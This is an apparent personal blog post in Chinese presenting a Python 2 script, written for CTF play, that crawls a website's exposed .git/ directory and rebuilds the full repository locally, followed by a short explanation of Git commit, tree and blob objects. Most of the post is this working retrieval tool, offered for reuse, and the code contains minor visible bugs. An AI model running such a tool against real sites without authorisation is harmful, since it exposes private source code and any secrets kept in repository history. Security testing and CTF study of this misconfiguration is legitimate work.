guest@blog.cmj.tw: ~/posts $

Git Crawler


Step-by-step with your own requirement

因為之前為了打 CTF 而寫的一個簡單的 .git 爬蟲:當網站開放使用 .git/ 路徑的時候,可以根據一定的規律將整個 repository 抓下來。

#! /usr/bin/env python
# Copyright (c) 2015-2015 cmj<cmj@cmj.tw>. All right reserved.

class Git(object):
    ''' Simple crawler for .git REPO '''
    def __init__(cls, url, storage='cmj/.git'):
        ''' initial the project and ensure the host can read .git repo '''
        import os

        cls._url_   = url
        cls.storage = storage

        path = storage.split('/')
        for _ in range(1, len(path)):
            _p = '{0}'.format('/'.join(path[:_]))
            if not os.path.isdir(_p):
                os.mkdir(_p)

        cls.HEAD()
        cls.ORIG_HEAD()
        cls.FETCH_HEAD()
        cls.config()
        cls.remote()
    def __call__(cls, seed):
        ''' Download the URL with particular seed '''
        import urllib2

        try:
            req = urllib2.urlopen('{0}/.git/{1}'.format(cls._url_, seed))
        except urllib2.HTTPError as e:
            return None
        else:
            return req.read()
    def __setitem__(cls, path, value):
        ''' Restore the file into local repo '''
        import os

        if not value:
            return
        path = path.split('/')
        for _ in range(len(path)):
            _p = '{0}/{1}'.format(cls.storage, '/'.join(path[:_]))
            if not os.path.isdir(_p):
                os.mkdir(_p)
        _p = '{0}/{1}'.format(cls.storage, '/'.join(path))
        with open(_p, 'wb') as fd:
            fd.write(value)

    def commit(cls, seed):
        ''' Get the commit and store into local, recursively if possible '''
        import zlib, struct, os

        seed = seed.strip()
        seed = 'objects/{0}/{1}'.format(seed[:2], seed[2:])

        if os.path.isfile(seed):
            return
        data = cls(seed)
        if not data:
            return
        cls[seed] = data

        ## Find the next commit
        data = zlib.decompress(data)
        fmt, size = data[:data.index(' ')], data[data.index(' '):data.index('\x00')]
        off = len(fmt) + 1 + len(size)
        data = data[off:off+int(size)]
        if 'commit' == fmt:
            seed = [_.split()[1] for _ in data.split('\n')[:2]]
            map(cls.commit, seed)
        elif 'tree' == fmt:
            seed = []
            while data:
                pos   = data.index('\x00')+1
                fmt   = '>IIIII'
                seed += [''.join(['%08x' %_ for _ in struct.unpack(fmt, data[pos: pos+20])])]
                data  = data[pos+20:]
            map(cls.commit, seed)
        elif 'blob' == fmt:
            pass
        else:
            raise NotImplementedError(fmt)

    def HEAD(cls):
        ''' Load .git/HEAD and related commits '''
        if not cls('HEAD'):
            raise SystemError('Size {0} is not support .git'.format(url))
        print 'Load .git/HEAD ...'
        data = cls('HEAD')
        cls['HEAD'] = data

        refs = data.split()[-1]
        seed = cls(refs)
        cls[refs] = seed
        cls.commit(seed)
    def ORIG_HEAD(cls):
        ''' Load .git/ORIG_HEAD and related commits '''
        print 'Load .git/ORIG_HEAD ...'
        data = cls('ORIG_HEAD')
        cls['ORIG_HEAD'] = data
        cls.commit(data)
    def FETCH_HEAD(cls):
        ''' Load .git/FETCH_HEAD and related commits '''
        print 'Load .git/FETCH_HEAD ...'
        data = cls('FETCH_HEAD')
        cls['FETCH_HEAD'] = data
        seed = [_.split()[0] for _ in data.split('\n') if _]
        map(cls.commit, seed)
    def config(cls):
        ''' Load .git/config '''
        print 'Load .git/config ...'
        cls['config'] = cls('config')
        cls['index'] = cls('index')
    def remote(cls):
        ''' Load .git/refs/remote/origin/HEAD and related commits  '''
        print 'Load .git/refs/remotes/origin/HEAD ...'
        data = cls('refs/remotes/origin/HEAD')
        cls['refs/remotes/origin/HEAD'] = data

        seed = data.split()[1]
        data = cls(seed)
        cls[seed] = data
        cls.commit(seed)

這個爬蟲的原理是:利用 .git/ 中一定存在的幾個檔案,來判斷有哪些 commit。像是可以從 .git/HEAD 當中可以了解目前 focus 在哪一個 branch (e.g. refs/heads/master),接下來就可以順著這個 commit tree 來撈取相關的 commits。

需要了解的,每一筆 commit 都可能包含了:commit / tree / blob 三種型態。第一種代表著這筆 commit 會跟哪些 commit 有關係, 而 tree 則表示這筆 commit 可能包含著其他的節點,這裡的節點可能包含著 tree 或者是 blob,而 blob 則表示真實儲存的資料點。